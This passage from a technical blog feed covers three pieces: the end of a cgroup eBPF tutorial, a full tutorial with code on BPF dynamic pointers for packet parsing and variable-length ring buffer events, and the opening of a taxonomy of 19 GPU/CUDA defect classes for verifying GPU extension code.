cgroup eBPF solves the problem of fine-grained control that traditional global policies can't achieve by binding policies to process groups. This tutorial demonstrated three commonly used cgroup hooks:

cgroup/connect4: Filter destination ports at TCP connection time, blocking disallowed outbound connections
cgroup/dev: Check major:minor at device access time, restricting reads/writes to specific devices
cgroup/sysctl: Check names at sysctl read/write time, preventing sensitive configuration leaks or tampering

This "policy guard" pattern can be extended to production use cases: container network policies (similar to Kubernetes NetworkPolicy), device isolation (GPU/TPU exclusive access), security sandboxes (restricting system information access). With ringbuf event reporting, you can also implement policy auditing and alerting.

If you want to learn more about eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

References

Kernel docs: libbpf program types - all cgroup-related section names
eBPF docs: CGROUP_SOCK_ADDR - socket address hooks explained
eBPF docs: CGROUP_DEVICE - device access control explained
eBPF docs: CGROUP_SYSCTL - sysctl access control explained
Tutorial repository: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/cgroup

Full source code is available in the tutorial repository. Requires Linux kernel 4.10+ (cgroup v2) and libbpf.

eBPF Tutorial by Example: BPF Dynamic Pointers for Variable-Length Data

云微 — Tue, 17 Feb 2026 07:43:38 +0000

Ever written an eBPF packet parser and struggled with those verbose data_end bounds checks that the verifier still rejects? Or tried to send variable-length events through ring buffers only to find yourself locked into fixed-size structures? Traditional eBPF development forces you to prove memory safety statically at compile time, which becomes painful when dealing with runtime-determined sizes like packet lengths or user-configurable snapshot lengths.

This is what BPF dynptrs (dynamic pointers) solve. Introduced gradually from Linux v5.19, dynptrs provide a verifier-friendly way to work with variable-length data by shifting some bounds checking from compile-time static analysis to runtime validation. In this tutorial, we'll build a TC ingress program that uses skb dynptrs to parse TCP packets safely and ringbuf dynptrs to output variable-length events containing configurable payload snapshots.

The complete source code: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/dynptr

Introduction to BPF Dynamic Pointers

The Problem: When Static Verification Isn't Enough

The eBPF verifier's core mission is proving memory safety at load time. Every pointer dereference must be bounded, every array access must be within limits. This works beautifully for simple cases, but becomes a struggle when sizes are determined at runtime.

Consider parsing a packet where the IP header length comes from a 4-bit field, or reading user-configurable amounts of TCP payload. The classic approach requires extensive bounds checking with data_end comparisons, and even correctly written code sometimes fails verification because the verifier cannot trace all possible paths. When working with non-linear skb data (paged buffers), the situation gets worse since that data isn't directly accessible through ctx->data at all.

Variable-length output presents similar challenges. The traditional bpf_ringbuf_reserve() returns a raw pointer, but writing runtime-determined amounts of data to it makes the verifier uncomfortable because it cannot statically prove your writes stay within bounds.

The Solution: Runtime-Checked Dynamic Pointers

Dynptrs introduce an opaque handle type that carries metadata about the underlying memory region including its bounds and type. You cannot dereference a dynptr directly since the verifier will reject such attempts. Instead, you must use helper functions or kfuncs that perform the appropriate safety checks.

The key insight is that some of these checks happen at runtime rather than compile time. Functions like bpf_dynptr_read() and bpf_dynptr_write() validate bounds when they execute and return errors on failure. Functions like bpf_dynptr_slice() return NULL when the requested region cannot be accessed safely. This lets you express logic that would be unprovable statically while maintaining safety guarantees.

For the verifier, dynptrs are tracked specially. They have lifecycle rules (some must be released), type constraints (skb dynptrs behave differently than local dynptrs), and the verifier ensures you follow these rules. The runtime checks are the verifier's way of delegating what it cannot prove statically.

Dynptr API Overview

Helpers vs Kfuncs

The dynptr ecosystem spans two categories of functions. Helper functions are part of the stable UAPI and generally maintain backward compatibility. Kfuncs (kernel functions) are internal kernel exports to BPF with no ABI stability guarantees, meaning they may change between kernel versions.

For dynptrs, the foundational read/write operations are helpers, while newer features like skb dynptrs and slicing are kfuncs. This means some dynptr functionality requires newer kernels and you should verify availability before relying on specific features.

Creating Dynptrs

There are several ways to create dynptrs depending on your data source. The bpf_dynptr_from_mem() helper creates a dynptr from map values or global variables, useful for working with configuration data or scratch buffers. The bpf_dynptr_from_skb() kfunc creates a dynptr from a socket buffer, enabling safe access to packet data including non-linear (paged) regions. For XDP programs, bpf_dynptr_from_xdp() provides similar functionality.

Ring buffer operations use bpf_ringbuf_reserve_dynptr() to allocate variable-length records. Unlike regular bpf_ringbuf_reserve() which returns a pointer to a fixed-size region, the dynptr variant lets you specify the size at runtime. This is crucial for variable-length event structures.

Reading and Writing

The bpf_dynptr_read() helper copies data from a dynptr into a destination buffer. It takes an offset and length, performing runtime bounds checking and returning an error if the read would exceed the dynptr's bounds. This is the safe way to extract data when you need it in a local buffer.

The bpf_dynptr_write() helper does the reverse, copying data into a dynptr. For skb dynptrs, writing may have additional semantics similar to bpf_skb_store_bytes(), and note that writes can invalidate previously obtained slices.

The bpf_dynptr_data() helper returns a direct pointer to data within the dynptr, with the verifier tracking the bounds statically. However, this does NOT work for skb or xdp dynptrs since their data may not be in a single contiguous region.

Slicing for Packet Parsing

For skb and xdp dynptrs, bpf_dynptr_slice() is the primary way to access data. You provide an offset, a length, and optionally a local buffer. The function returns a pointer to the requested data, which may be either a direct pointer into the packet or your provided buffer (if the data needed to be copied from non-linear regions).

The critical rule is that you must NULL-check the return value. A NULL return means the requested region cannot be accessed, either because it exceeds packet bounds or for other internal reasons. Once you have a valid slice pointer, you can dereference it safely within the requested bounds.

There's also bpf_dynptr_slice_rdwr() for obtaining writable slices, with availability depending on the program type and whether the underlying data supports writes.

Ring Buffer Lifecycle

The bpf_ringbuf_reserve_dynptr() function has special lifecycle rules enforced by the verifier. Once you call it, you must call either bpf_ringbuf_submit_dynptr() or bpf_ringbuf_discard_dynptr() on the dynptr, regardless of whether the reservation succeeded. This is not optional since the verifier tracks dynptr state and will reject programs that leak reserved dynptrs.

This differs from regular ringbuf usage where a NULL return from bpf_ringbuf_reserve() means nothing was allocated. With dynptrs, the reserve failure still requires explicit cleanup through discard. The verifier needs this guarantee to ensure proper resource management.

Implementation: TC Ingress with Dynptr Parsing and Variable-Length Events

Our demonstration program attaches to TC ingress and accomplishes three things. First, it creates an skb dynptr from incoming packets using bpf_dynptr_from_skb(). Second, it parses Ethernet, IPv4, and TCP headers using bpf_dynptr_slice() for safe bounds-checked access. Third, it outputs variable-length events through a ringbuf dynptr, including a configurable snapshot of TCP payload.

Complete BPF Program: dynptr_tc.bpf.c

// SPDX-License-Identifier: GPL-2.0
#include <vmlinux.h>
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_endian.h>

#include "dynptr_tc.h"

/* kfunc declarations for dynptr operations (v6.4+) */
extern int bpf_dynptr_from_skb(struct __sk_buff *s, __u64 flags,
                               struct bpf_dynptr *ptr__uninit) __ksym;
extern void *bpf_dynptr_slice(const struct bpf_dynptr *ptr, __u32 offset,
                              void *buffer__opt, __u32 buffer__sz) __ksym;

struct {
    __uint(type, BPF_MAP_TYPE_RINGBUF);
    __uint(max_entries, 1 << 24); /* 16MB */
} events SEC(".maps");

struct {
    __uint(type, BPF_MAP_TYPE_ARRAY);
    __uint(max_entries, 1);
    __type(key, __u32);
    __type(value, struct dynptr_cfg);
} cfg_map SEC(".maps");

SEC("tc")
int dynptr_tc_ingress(struct __sk_buff *ctx)
{
    const struct dynptr_cfg *cfg;
    struct bpf_dynptr skb_ptr;

    /* Temporary buffers for slice (data may be copied here) */
    struct ethhdr eth_buf;
    struct iphdr  ip_buf;
    struct tcphdr tcp_buf;

    const struct ethhdr *eth;
    const struct iphdr  *iph;
    const struct tcphdr *tcp;

    cfg = bpf_map_lookup_elem(&cfg_map, &(__u32){0});
    if (!cfg)
        return TC_ACT_OK;

    /* Create dynptr from skb */
    if (bpf_dynptr_from_skb(ctx, 0, &skb_ptr))
        return TC_ACT_OK;

    /* Parse Ethernet header using slice */
    eth = bpf_dynptr_slice(&skb_ptr, 0, &eth_buf, sizeof(eth_buf));
    if (!eth)
        return TC_ACT_OK;

    if (eth->h_proto != bpf_htons(ETH_P_IP))
        return TC_ACT_OK;

    /* Parse IPv4 header */
    __u32 ip_off = sizeof(*eth);
    iph = bpf_dynptr_slice(&skb_ptr, ip_off, &ip_buf, sizeof(ip_buf));
    if (!iph || iph->version != 4 || iph->protocol != IPPROTO_TCP)
        return TC_ACT_OK;

    /* Parse TCP header */
    __u32 tcp_off = ip_off + ((__u32)iph->ihl * 4);
    tcp = bpf_dynptr_slice(&skb_ptr, tcp_off, &tcp_buf, sizeof(tcp_buf));
    if (!tcp)
        return TC_ACT_OK;

    __u16 dport = bpf_ntohs(tcp->dest);
    __u16 sport = bpf_ntohs(tcp->source);
    __u8 drop = (cfg->blocked_port && (sport == cfg->blocked_port || dport == cfg->blocked_port));

    /* Output variable-length event using ringbuf dynptr */
    if (cfg->enable_ringbuf) {
        __u32 snap_len = cfg->snap_len;
        __u8 payload[MAX_SNAPLEN] = {};

        __u32 payload_off = tcp_off + ((__u32)tcp->doff * 4);
        if (payload_off < ctx->len) {
            __u32 avail = ctx->len - payload_off;
            if (snap_len > avail) snap_len = avail;
            if (snap_len > MAX_SNAPLEN) snap_len = MAX_SNAPLEN;

            if (bpf_dynptr_read(payload, snap_len, &skb_ptr, payload_off, 0))
                snap_len = 0;
        } else {
            snap_len = 0;
        }

        struct event_hdr hdr = {
            .ts_ns = bpf_ktime_get_ns(),
            .ifindex = ctx->ifindex,
            .pkt_len = ctx->len,
            .saddr = iph->saddr,
            .daddr = iph->daddr,
            .sport = bpf_ntohs(tcp->source),
            .dport = dport,
            .drop = drop,
            .snap_len = snap_len,
        };

        /* Reserve variable-length ringbuf record */
        struct bpf_dynptr rb;
        __u32 total_sz = sizeof(hdr) + snap_len;

        long err = bpf_ringbuf_reserve_dynptr(&events, total_sz, 0, &rb);
        if (err) {
            /* Must discard even on failure */
            bpf_ringbuf_discard_dynptr(&rb, 0);
            return drop ? TC_ACT_SHOT : TC_ACT_OK;
        }

        bpf_dynptr_write(&rb, 0, &hdr, sizeof(hdr), 0);
        if (snap_len)
            bpf_dynptr_write(&rb, sizeof(hdr), payload, snap_len, 0);

        bpf_ringbuf_submit_dynptr(&rb, 0);
    }

    return drop ? TC_ACT_SHOT : TC_ACT_OK;
}

char _license[] SEC("license") = "GPL";

Understanding the BPF Code

The program begins by declaring the kfuncs it needs. The bpf_dynptr_from_skb() function creates a dynptr from the socket buffer, and bpf_dynptr_slice() returns pointers to specific regions within it. The __ksym attribute tells the loader these are kernel symbols to be resolved at load time.

When parsing headers, notice how we provide local buffers (eth_buf, ip_buf, tcp_buf) to each slice call. The slice function may return a pointer directly into packet data if it's linearly accessible, or it may copy data into our buffer and return a pointer to the buffer. Either way, we get a valid pointer we can dereference, or NULL on failure.

The NULL check pattern is crucial. Each slice call can fail if the requested offset plus length exceeds packet bounds or if the data cannot be accessed for other reasons. Checking for NULL before using the returned pointer is mandatory.

For ringbuf output, we use bpf_dynptr_read() to copy TCP payload from the skb into a local buffer first. This demonstrates reading from an skb dynptr with runtime-determined length (bounded by configuration and available data). The read may fail if bounds are exceeded, in which case we set snap_len to zero.

The ringbuf dynptr reserve shows the variable-length allocation pattern. We compute the total size (header plus snapshot) and reserve that exact amount. After writing both the header and payload using bpf_dynptr_write(), we submit the record. Note the discard call on reserve failure to satisfy the verifier's lifecycle requirements.

Complete User-Space Program: dynptr_tc.c

// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause)
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <bpf/libbpf.h>
#include <bpf/bpf.h>

#include "dynptr_tc.skel.h"
#include "dynptr_tc.h"

static volatile sig_atomic_t exiting = 0;

static void sig_handler(int signo) { exiting = 1; }

static int handle_event(void *ctx, void *data, size_t data_sz)
{
    const struct event_hdr *e = data;
    char saddr[INET_ADDRSTRLEN], daddr[INET_ADDRSTRLEN];

    inet_ntop(AF_INET, &e->saddr, saddr, sizeof(saddr));
    inet_ntop(AF_INET, &e->daddr, daddr, sizeof(daddr));

    printf("if=%u %s:%u -> %s:%u len=%u drop=%u snap=%u",
           e->ifindex, saddr, e->sport, daddr, e->dport,
           e->pkt_len, e->drop, e->snap_len);

    if (e->snap_len && data_sz >= sizeof(*e) + e->snap_len) {
        printf(" payload=\"");
        for (int i = 0; i < e->snap_len; i++) {
            unsigned char c = e->payload[i];
            putchar((c >= 32 && c <= 126) ? c : '.');
        }
        printf("\"");
    }
    printf("\n");
    return 0;
}

int main(int argc, char **argv)
{
    const char *ifname = NULL;
    struct dynptr_cfg cfg = { .blocked_port = 0, .snap_len = 64, .enable_ringbuf = 1 };

    /* Parse arguments */
    for (int i = 1; i < argc; i++) {
        if (!strcmp(argv[i], "-i") && i+1 < argc) ifname = argv[++i];
        else if (!strcmp(argv[i], "-p") && i+1 < argc) cfg.blocked_port = atoi(argv[++i]);
        else if (!strcmp(argv[i], "-s") && i+1 < argc) cfg.snap_len = atoi(argv[++i]);
        else if (!strcmp(argv[i], "-n")) cfg.enable_ringbuf = 0;
    }

    if (!ifname) {
        fprintf(stderr, "Usage: %s -i <ifname> [-p port] [-s len] [-n]\n", argv[0]);
        return 1;
    }

    int ifindex = if_nametoindex(ifname);
    if (!ifindex) { perror("if_nametoindex"); return 1; }

    signal(SIGINT, sig_handler);
    signal(SIGTERM, sig_handler);

    struct dynptr_tc_bpf *skel = dynptr_tc_bpf__open_and_load();
    if (!skel) { fprintf(stderr, "Failed to load BPF\n"); return 1; }

    /* Configure */
    bpf_map_update_elem(bpf_map__fd(skel->maps.cfg_map), &(__u32){0}, &cfg, BPF_ANY);

    /* Attach to TC ingress */
    struct bpf_tc_hook hook = { .sz = sizeof(hook), .ifindex = ifindex, .attach_point = BPF_TC_INGRESS };
    struct bpf_tc_opts opts = { .sz = sizeof(opts), .handle = 1, .priority = 1,
                                .prog_fd = bpf_program__fd(skel->progs.dynptr_tc_ingress) };

    bpf_tc_hook_create(&hook);
    if (bpf_tc_attach(&hook, &opts)) { fprintf(stderr, "TC attach failed\n"); goto cleanup; }

    struct ring_buffer *rb = cfg.enable_ringbuf ?
        ring_buffer__new(bpf_map__fd(skel->maps.events), handle_event, NULL, NULL) : NULL;

    printf("Attached to %s. blocked_port=%u snap_len=%u\n", ifname, cfg.blocked_port, cfg.snap_len);

    while (!exiting) {
        if (rb) ring_buffer__poll(rb, 100);
        else usleep(100000);
    }

    ring_buffer__free(rb);
    bpf_tc_detach(&hook, &opts);
    bpf_tc_hook_destroy(&hook);
cleanup:
    dynptr_tc_bpf__destroy(skel);
    return 0;
}

Understanding the User-Space Code

The userspace program loads the BPF skeleton, configures it through the array map, and attaches to TC ingress. The ring buffer callback handle_event() receives each variable-length event and prints it.

Notice how we access the variable-length payload. The struct event_hdr has a flexible array member payload[] at the end. When an event arrives, data_sz tells us the total size, and e->snap_len tells us specifically how much payload was included. We validate both before accessing the payload bytes.

The configuration map allows runtime control over blocking behavior and snapshot length without reloading the BPF program. This demonstrates the common pattern of using maps for user-to-kernel communication.

Compilation and Execution

Navigate to the dynptr directory and build:

cd bpf-developer-tutorial/src/features/dynptr
make

This compiles the BPF program with the repository's standard toolchain, generating the skeleton header and linking against libbpf.

Creating a Test Environment

To test properly, we need a network namespace so traffic actually traverses the veth pair rather than going through loopback. The included test.sh script handles this automatically, but here's the manual setup:

# Create network namespace
sudo ip netns add test_ns

# Create veth pair with one end in the namespace
sudo ip link add veth_host type veth peer name veth_ns
sudo ip link set veth_ns netns test_ns

# Configure host side
sudo ip addr add 10.200.0.1/24 dev veth_host
sudo ip link set veth_host up

# Configure namespace side
sudo ip netns exec test_ns ip addr add 10.200.0.2/24 dev veth_ns
sudo ip netns exec test_ns ip link set veth_ns up

# Start HTTP server inside the namespace
sudo ip netns exec test_ns python3 -m http.server 8080 --bind 10.200.0.2 &

Running the Demo

Start the dynptr TC program attached to the host side of the veth:

sudo ./dynptr_tc -i veth_host -p 0 -s 32

In another terminal, make a request:

curl http://10.200.0.2:8080/

You should see output showing captured packets:

Attached to TC ingress of veth_host (ifindex=X). Ctrl-C to exit.
blocked_port=0 snap_len=32 ringbuf=1
if=X 10.200.0.2:8080 -> 10.200.0.1:XXXXX len=221 drop=0 snap=32 payload="HTTP/1.0 200 OK..Server: SimpleH"
if=X 10.200.0.2:8080 -> 10.200.0.1:XXXXX len=742 drop=0 snap=32 payload="<!DOCTYPE HTML>.<html lang="en">"

The output shows HTTP response packets from the server, with the payload field containing the beginning of the response data.

Testing the Drop Policy

Test blocking by specifying port 8080:

sudo ./dynptr_tc -i veth_host -p 8080 -s 32

In another terminal:

curl --max-time 3 http://10.200.0.2:8080/

The curl should timeout since response packets are blocked. The dynptr_tc output shows drop=1:

if=X 10.200.0.2:8080 -> 10.200.0.1:XXXXX len=74 drop=1 snap=0

Using the Test Script

For convenience, run the included test script which handles all setup automatically:

sudo ./test.sh

This creates the namespace, runs both capture and blocking tests, and cleans up afterward.

When to Use Dynptrs

Dynptrs shine in several scenarios. Variable-length events are the classic use case since ringbuf dynptrs let you allocate exactly the size you need at runtime, avoiding wasted space from oversized fixed structures or complex multi-record schemes.

Packet parsing benefits from dynptrs when dealing with non-linear skbs or complex protocol stacks where traditional bounds checking becomes unwieldy. The slice API provides a cleaner abstraction that handles both linear and paged data uniformly.

Crypto and verification operations like bpf_crypto_encrypt(), bpf_verify_pkcs7_signature(), and bpf_get_file_xattr() all use dynptrs as buffer arguments, making dynptr familiarity essential for these advanced use cases.

User ringbuf consumption through bpf_user_ringbuf_drain() delivers samples as dynptrs, enabling safe handling of userspace-provided data in BPF programs.

For simple fixed-size operations where you know bounds at compile time, traditional approaches may be simpler. But as your BPF programs grow more sophisticated, dynptrs become increasingly valuable.

Summary

BPF dynptrs provide a verifier-friendly mechanism for working with variable-length and runtime-bounded data. Rather than proving memory safety entirely through static analysis, dynptrs shift some verification to runtime checks, enabling patterns that would otherwise be impossible or extremely awkward to express.

Our example demonstrated the two primary dynptr patterns: using skb dynptrs with slices for clean packet parsing, and using ringbuf dynptrs for variable-length event output. The key takeaways are to always NULL-check slice returns, always submit or discard ringbuf dynptrs, and remember that skb dynptrs require kfuncs available from Linux v6.4.

As eBPF capabilities continue to expand, dynptrs form an increasingly important part of the toolkit. Whether you're building packet processors, security monitors, or performance tools, understanding dynptrs will help you write cleaner, more capable BPF programs.

If you'd like to dive deeper into eBPF, check out our tutorial repository at https://github.com/eunomia-bpf/bpf-developer-tutorial or visit our website at https://eunomia.dev/tutorials/.

References

Dynptr Concept Documentation: https://docs.ebpf.io/linux/concepts/dynptrs/
bpf_ringbuf_reserve_dynptr Helper: https://docs.ebpf.io/linux/helper-function/bpf_ringbuf_reserve_dynptr/
bpf_dynptr_from_skb Kfunc: https://docs.ebpf.io/linux/kfuncs/bpf_dynptr_from_skb/
bpf_dynptr_slice Kfunc: https://docs.ebpf.io/linux/kfuncs/bpf_dynptr_slice/
Kernel Kfuncs Documentation: https://docs.kernel.org/bpf/kfuncs.html
Tutorial Repository: https://github.com/eunomia-bpf/bpf-developer-tutorial

This example requires Linux kernel 6.4 or newer for the skb dynptr kfuncs. The ringbuf dynptr helpers are available from Linux 5.19. Complete source code is available in the tutorial repository.

A Taxonomy of GPU Bugs: 19 Defect Classes for CUDA Verification

云微 — Tue, 10 Feb 2026 07:53:16 +0000

Introduction

GPU programming introduces a distinct class of correctness and performance challenges that differ fundamentally from traditional CPU-based systems. The SIMT (Single Instruction, Multiple Threads) execution model, hierarchical memory architecture, and massive parallelism create unique bug patterns that require specialized verification and detection techniques.

Just as eBPF enables safe, verified extension code to run inside the Linux kernel, bpftime gpu_ext (The arxiv, previous name eGPU) bring eBPF to GPUs, allowing user-defined policy code (for observability, scheduling, or resource control) to be injected into GPU drivers and kernels with static verification guarantees. Such a GPU extension framework must ensure that policy code cannot introduce crashes, hangs, data races, or unbounded overhead. A critical concern in modern GPU deployments is performance interference in multi-tenant environments: contention for shared resources makes execution time unpredictable. "Making Powerful Enemies on NVIDIA GPUs" studies how adversarial kernels can amplify slowdowns, arguing that performance interference is a system-level safety property when GPUs are shared. This motivates treating bounded overhead as a correctness property, not merely an optimization goal.

To build a sound GPU extension verifier, we must first understand what can go wrong. This taxonomy identifies the defect classes a verifier must address, drawing lessons from eBPF's success: restrict the programming model, enforce bounded execution, and verify memory safety before loading. We synthesize findings from static verifiers (GPUVerify, GKLEE, ESBMC-GPU), dynamic detectors (Compute Sanitizer, Simulee, CuSan), and empirical bug studies (Wu et al., ScoRD, iGUARD) into 19 defect classes organized along two dimensions: impact type (Safety, Correctness, Performance) and GPU specificity (GPU-specific, GPU-amplified, CPU-shared). Each entry provides concrete examples, documents detection tools, and offers actionable verification strategies.

Taxonomy Overview

Each bug class is categorized along four dimensions:

Impact Type:

Safety: Program fails to complete safely (crash, hang, isolation failure, deadlock)
Correctness: Program completes but produces wrong results
Performance: Program works correctly but inefficiently

GPU Specificity:

GPU-specific: Unique to GPU/SIMT execution model
GPU-amplified: Exists on CPUs but much more severe on GPUs
CPU-shared: Similar on both platforms

Verification Scope (for GPU extension frameworks):

E (Extension-local): Can be verified by examining only the extension/policy code, without inspecting the host kernel. This is the ideal case: like eBPF, the verifier can provide strong safety guarantees for any kernel the extension attaches to.
C (Combined): Requires joint analysis of extension + kernel, or a contract between them. These bugs arise from interactions between policy code and kernel state/behavior.
H (Host+Device/System): Involves host-side API ordering, driver state, or cross-boundary interactions that cannot be verified by device-side analysis alone.

Assurance Type (Soundness/Completeness guarantees):

By-construction: Bug class is structurally impossible due to language/feature restrictions. Soundness: perfect (the bug cannot exist). Completeness: high for policy use cases (restrictions rarely limit legitimate policies).
Static-sound: If verifier accepts, property holds; but some safe programs rejected. Soundness: strong. Completeness: low (conservative).
Contract-based: Requires declared preconditions validated at attach/launch time. Soundness: conditional on contract correctness. Completeness: depends on contract expressiveness.
Bounded-sound: Sound within specified bounds (loop unrolling, context switches). Soundness: within bounds. Completeness: limited by bound coverage.
Dynamic-only: Detected at runtime; no static guarantee. Soundness: for executed paths only. Completeness: coverage-dependent.
Runtime-enforced: Property enforced via instrumentation/interception. Soundness: if enforcement is complete. Completeness: N/A (enforcement, not verification).

Why These Dimensions Matter for GPU Extension Verifiers

A GPU extension framework (like bpftime gpu_ext) aims to provide static verification guarantees analogous to eBPF: policy code should be safe to attach to any kernel without risking crashes, hangs, or unbounded overhead. The key insight is:

Extension-local verification is the only path to strong, universal guarantees. If a bug class can be eliminated by restricting the policy language or enforcing invariants on policy code alone, the verifier can guarantee safety without inspecting (potentially closed-source) kernels.

For Combined bugs, the framework has two options: (1) restrict policy capabilities so the bug becomes Extension-local (e.g., forbid policies from writing kernel memory), or (2) require kernel-side contracts/annotations and validate at attach time.

For Host+Device bugs, device-side verification is insufficient; these require host-side tooling (CuSan, TSan) or runtime enforcement in the driver/loader.

Understanding Soundness vs. Completeness

The Assurance Type dimension makes explicit what guarantees each verification approach provides:

Soundness answers: "If the verifier accepts, does the property definitely hold?" A sound verifier never produces false negatives (misses real bugs).
Completeness answers: "If the property holds, will the verifier accept?" A complete verifier never produces false positives (rejects safe programs).

For safety-critical GPU extensions, we prioritize soundness over completeness: it's acceptable to reject some safe policies if it means we never accept unsafe ones. The table below shows not just what can be verified, but how strong the guarantee is.

#	Bug Class	Impact	GPU Spec.	Scope	Assurance Type
1	Barrier Divergence	Safety	GPU-specific	E	Static-sound (enforce uniform barrier placement)
2	Invalid Warp Sync	Safety	GPU-specific	E	By-construction (ban warp sync)
3	Insufficient Atomic/Sync Scope	Correctness	GPU-specific	C→E	Static-sound (isolate state + device-scope)
4	Warp-divergence Race	Correctness	GPU-specific	E	Static-sound (uniform side-effects)
5	Uncoalesced Memory Access	Performance	GPU-specific	E/C	Static-sound (restrict patterns)
6	Control-Flow Divergence	Performance	GPU-specific	E	Static-sound (enforce uniformity)
7	Bank Conflicts	Performance	GPU-specific	E	Static-heuristic (enforce conflict-free patterns)
8	Block-Size Dependence	Correctness	GPU-specific	E/C	Contract-based (declare requirements)
9	Launch Config Assumptions	Correctness	GPU-specific	C	Contract-based (validate at attach)
10	Missing Volatile/Fence	Correctness	GPU-specific	E	By-construction (ban spin-wait)
11	Shared-Memory Data Races	Correctness	GPU-specific	E	Static-sound (restrict writes)
12	Redundant Barriers	Performance	GPU-specific	E	Static-heuristic (detect unnecessary barriers)
13	Host ↔ Device Async Races	Correctness	GPU-specific	H	Dynamic-only (CuSan/TSan)
14	Atomic Contention	Performance	GPU-amplified	C→E	Static-sound (budgetize atomics)
15	Non-Barrier Deadlocks	Safety	GPU-amplified	E	By-construction (ban blocking)
16	Kernel Non-Termination	Safety	GPU-amplified	E	Static-sound (bound iterations)
17	Global-Memory Data Races	Correctness	CPU-shared	C→E	Static-sound (isolate state)
18	Memory Safety	Safety	CPU-shared	E	Static-sound (restrict pointers)
19	Arithmetic Errors	Correctness	CPU-shared	E	Static-sound (range analysis)

Insights from a Taxonomy of GPU Defects

We conducted a comprehensive study of GPU correctness defects by synthesizing findings from empirical bug analyses (Wu et al., iGUARD), static verifiers (GPUVerify, GKLEE, ESBMC-GPU), and runtime detectors (Compute Sanitizer, Simulee, ScoRD). Our taxonomy identifies 19 distinct classes of GPU programming defects, uncovering fundamental insights into the unique correctness challenges posed by GPU architectures:

First, we observe that control-flow uniformity is a foundational correctness requirement for GPU kernels. Non-uniform execution across threads, caused by GPU's SIMT execution model, breaks implicit synchronization assumptions and triggers GPU-specific correctness violations, such as barrier divergence, warp synchronization errors, and subtle warp-divergence races. This insight elevates uniformity from a performance concern to a correctness property that GPU verification frameworks must explicitly enforce.

Second, GPU's scoped memory synchronization semantics (e.g., block-scoped atomics, missing fences, volatile misuse) create unique correctness hazards rarely encountered on CPU platforms. Our analysis emphasizes that synchronization primitives' scopes must be explicit, conservative, and verifiable at the kernel level. This requirement is critical for correctness given GPU memory model subtleties.

Third, performance interference in GPUs, manifested as uncoalesced accesses, atomic contention, redundant barriers, and bank conflicts, must be viewed as a safety and isolation concern rather than mere inefficiency. Our taxonomy reveals how adversarial workloads exploit GPU parallelism to amplify performance issues into denial-of-service attacks in multi-tenant environments. Consequently, bounded overhead must be explicitly enforced as a correctness property in GPU extension frameworks.

Finally, our study highlights that liveness (deadlocks, infinite loops) and memory safety (out-of-bounds accesses, temporal violations) are system-level concerns uniquely amplified by GPU parallelism. Unlike traditional CPU environments, GPU kernel hangs or memory violations can trigger hardware-level recovery affecting all tenants. Thus, GPU liveness and memory safety must be explicitly recognized as first-class system-level correctness properties in verifier designs.

Together, these insights not only characterize GPU correctness issues more precisely but also inform principled design requirements for GPU kernel extensibility and verification frameworks, moving beyond traditional CPU-centric correctness towards a GPU-aware system correctness definition. We are applying these principles in bpftime, you can find more detail in arXiv.

Insights from Verification Scope and Assurance Analysis

Beyond characterizing what can go wrong, we analyze whether and how each bug class can be addressed by a GPU extension verifier. By examining each defect through the lens of verification scope (Extension-local vs. Combined vs. Host+Device) and assurance type (soundness and completeness guarantees), we arrive at several key conclusions for GPU extension framework design.

Extension-local verification is sufficient for the majority of GPU bug classes. Of the 19 defect classes identified, 14 can be fully addressed through Extension-local verification, examining only the policy code without inspecting the host kernel. Some of these (#2, #10, #15) can be eliminated by construction through language restrictions: banning warp sync primitives, spin-wait patterns, and blocking constructs makes entire bug classes structurally impossible. Others (#1, #7, #12) use static analysis to enforce safe usage patterns (uniform barrier placement, conflict-free shared-memory access, redundant barrier detection) rather than outright bans, preserving useful functionality while maintaining safety. Four additional classes (#3, #5, #14, #17) that initially appear to require Combined analysis can be reduced to Extension-local through state isolation, restricting policies to write only policy-owned objects (maps, ringbuffers) rather than kernel data structures. This finding validates the eBPF design philosophy: by appropriately restricting extension capabilities, a verifier can provide strong safety guarantees for any kernel, including closed-source ones.

Only three bug classes fundamentally resist Extension-local verification. Block-size dependence (#8) and launch configuration assumptions (#9) depend on host-determined launch parameters invisible to the policy verifier; these require a contract-based approach where policies declare preconditions validated at attach time. Host↔device async races (#13) span the host API boundary entirely outside device-side verification scope; these can only be addressed through dynamic detection tools like CuSan. Importantly, these three classes represent a small, well-defined subset that can be handled through complementary mechanisms rather than requiring full Combined verification of kernel+extension.

Soundness and completeness trade-offs are explicit and favorable for safety-critical extensions. By-construction approaches (banning genuinely dangerous features like spin-wait and blocking primitives) achieve perfect soundness with high completeness for policy use cases. Static-sound approaches (uniform barrier placement, conflict-free access pattern enforcement, uniformity analysis, bounds checking, range analysis) provide strong soundness while preserving useful functionality, at the cost of conservatively rejecting some safe programs. For safety-critical GPU extensions, this trade-off is appropriate: it is better to reject a safe policy than to accept an unsafe one. The verifier's job is to guarantee safety for any kernel, not to accept every possible safe program.

A two-track verification pipeline emerges as the principled design. The production track provides hard guarantees for any kernel through Extension-local verification at load time, contract validation at attach time, and optional runtime enforcement for multi-tenant isolation. The CI/offline track enhances coverage through Combined analysis tools (GPUVerify, ESBMC-GPU) when kernel source is available, dynamic sanitizers (Compute Sanitizer, iGUARD, Simulee) for regression testing, and host-side race detection (CuSan) for API ordering bugs. This separation acknowledges that Combined verification, while valuable for development and testing, cannot be a production requirement for systems targeting arbitrary kernels.

Performance interference can be bounded but not eliminated. While adversarial workloads can systematically amplify interference through shared GPU resources (as demonstrated by "Making Powerful Enemies on NVIDIA GPUs"), the verifier can still provide meaningful guarantees: bounding policy overhead per invocation through instruction/helper budgets, limiting atomic contention through warp-aggregation requirements, and enforcing coalesced access patterns. These guarantees bound the policy's contribution to interference, even if system-wide slowdown bounds remain impossible to guarantee statically.

In summary, the verification scope analysis reveals that the eBPF success pattern (restricting extension capabilities to what can be verified without inspecting the host) transfers effectively to GPUs. Through language restrictions, state isolation, and budgetization, a GPU extension verifier can provide strong, universal safety guarantees while relegating the few irreducibly Combined or Host+Device properties to contracts and dynamic detection.

Canonical bug list

1) Barrier Divergence at Block Barriers (`__syncthreads`) [Safety, GPU-specific]

What it is / why it matters

